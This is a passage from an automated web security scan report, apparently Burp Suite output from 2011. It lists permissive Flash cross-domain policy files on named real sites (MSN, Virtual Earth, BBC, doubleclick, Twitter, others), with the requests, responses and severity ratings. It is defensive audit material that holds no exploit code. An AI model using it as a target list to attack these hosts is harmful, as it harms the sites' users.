P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 12:04:44 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.6. http://cdn-cms.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn-cms.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Location: http://cdn-cms.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
ETag: "01f3482dc3fcb1:853"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
Date: Tue, 19 Jul 2011 12:04:55 GMT
Content-Length: 222
Connection: close
Akamai: True

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

3.7. http://dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:11:01 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

3.8. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 77449
Date: Tue, 19 Jul 2011 12:09:28 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.9. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 80652
Date: Tue, 19 Jul 2011 12:09:27 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.10. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 118093
Date: Tue, 19 Jul 2011 12:09:26 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.11. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 74673
Date: Tue, 19 Jul 2011 12:09:26 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.12. http://img1.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:34 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

3.13. http://img2.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:35 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

3.14. http://img3.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 329083
Date: Tue, 19 Jul 2011 12:10:34 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Fri, 29 Jul 2011 16:45:51 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

3.15. http://img4.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:35 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

3.16. http://minerva.healthcentral.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://minerva.healthcentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: minerva.healthcentral.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Omniture DC/2.0.0
xserver: www192
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.17. http://sensor2.suitesmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 18:15:01 GMT
ETag: "1f00e1-c9-49c927e105340"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.18. http://static.suitesmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e27-ca-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Date: Tue, 19 Jul 2011 01:58:24 GMT
Connection: close
Cache-Control: no-store

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.19. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:89c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 01:59:53 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.20. http://t0.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t0.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Content-Length: 207

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.21. http://www.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:ded"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:04:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

3.22. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Tue, 19 Jul 2011 03:06:52 GMT
Date: Tue, 19 Jul 2011 03:04:52 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.23. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 18 Jul 2011 22:46:41 GMT
Expires: Tue, 19 Jul 2011 22:46:41 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 11596
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.24. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=116
Expires: Tue, 19 Jul 2011 03:06:47 GMT
Date: Tue, 19 Jul 2011 03:04:51 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.25. http://server.iad.liveperson.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:1199"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 02:00:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

3.26. http://www.codero.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.codero.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.codero.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 04 Feb 2011 20:44:27 GMT
ETag: "43f417-cf-f2b360c0"
Accept-Ranges: bytes
Content-Length: 207
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:56 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.codero.com" />
<allow-access-from domain="*.ookla.com" />
<allow-access-from domain="*.speedtest.net" />
</cross-domain-p
...[SNIP]...

3.27. http://www.healthcentral.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthcentral.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Accept-Ranges: bytes
Last-Modified: Wed, 14 Oct 2009 16:46:43 GMT
ETag: "1CA4CEDE8CA1B80:1CC45558567C1E9"
Content-Type: text/xml
Content-Length: 362
Cache-Control: public, max-age=44354
Expires: Tue, 19 Jul 2011 14:18:09 GMT
Date: Tue, 19 Jul 2011 01:58:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com" />
<allow-access-from domain="*.choicemedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.healthcentral.com" secure="false" />
...[SNIP]...

3.28. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:12 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 12 Jul 2011 21:05:19 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 02:31:12 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy  previous  next
There are 22 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

